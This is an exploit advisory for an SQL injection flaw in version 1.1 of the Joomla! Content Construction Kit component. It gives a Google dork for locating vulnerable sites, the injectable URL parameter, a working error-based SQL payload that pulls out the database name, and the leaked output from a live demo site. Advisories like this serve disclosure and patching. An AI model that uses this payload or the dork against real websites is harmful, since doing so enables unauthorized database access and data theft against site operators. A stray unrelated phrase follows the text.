# # # # # # Exploit Title: Joomla! Component Content ConstructionKit v1.1 - SQL Injection # Google Dork: inurl:index.php?option=com_os_cck # Date: 04.03.2017 # Vendor Homepage: http://ordasoft.com/ # Software Buy: http://ordasoft.com/cck-content-construction-kit-for-joomla.html # Demo: http://ordasvit.com/joomla-cck-classic/ # Version: 1.1 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php/2016-04-11-13-03-22/search?search=Ihsan_Sencan&categories[]=[SQL]&task=search&option=com_os_cck&Itemid=133 # 9+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a) # 1062 Duplicate entry 'ordasvit_joomla-cck-classic~IhsanSencan1' for key 'group_key' # Etc.. # # # # #
体验盒子
